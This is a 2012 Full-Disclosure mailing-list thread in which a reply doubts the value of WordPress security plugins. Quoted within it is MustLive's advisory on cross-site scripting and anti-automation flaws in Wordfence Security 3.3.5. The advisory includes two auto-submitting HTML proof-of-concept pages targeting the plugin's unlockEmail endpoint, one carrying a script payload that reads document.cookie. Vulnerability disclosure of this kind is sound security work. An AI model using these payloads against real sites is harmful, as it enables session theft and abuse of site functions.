Its a bit like having a security alarm for an open door, IMHO. On 20 October 2012 04:37, Philip Whitehouse <[email protected]> wrote:
> Hmm, > > Another 'security' plugin with vulnerabilities... > > What exactly is the point of them? Even in an ideal world surely WP should > be secure anyway - doesn't it just increase the attack surface? > > Philip Whitehouse > > On 19 Oct 2012, at 18:16, "MustLive" <[email protected]> wrote: > > > Hello list! > > > > I want to warn you about Cross-Site Scripting and Insufficient > > Anti-automation vulnerabilities in Wordfence Security for WordPress. > > > > Wordfence - it's security plugin for WordPress. > > > > ------------------------- > > Affected products: > > ------------------------- > > > > Vulnerable are Wordfence Security 3.3.5 and previous versions. > > > > ---------- > > Details: > > ---------- > > > > XSS (WASC-08): > > > > Wordfence Security XSS.html > > > > <html> > > <head> > > <title>Wordfence Security XSS exploit (C) 2012 MustLive. > > http://websecurity.com.ua</title> > > </head> > > <body onLoad="document.hack.submit()"> > > <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post"> > > <input type="hidden" name="email" > > value="<script>alert(document.cookie)</script>"> > > </form> > > </body> > > </html> > > > > Insufficient Anti-automation (WASC-21): > > > > Wordfence Security IAA.html > > > > <html> > > <head> > > <title>Wordfence Security IAA exploit (C) 2012 MustLive. > > http://websecurity.com.ua</title> > > </head> > > <body onLoad="document.hack.submit()"> > > <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post"> > > <input type="hidden" name="email" value="[email protected]"> > > </form> > > </body> > > </html> > > > > I've informed the plugin developer about vulnerabilities. And mentioned > > about these vulnerabilities at my site (http://websecurity.com.ua/6106/ > ). > > > > Best wishes & regards, > > MustLive > > Administrator of Websecurity web site > > http://websecurity.com.ua > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
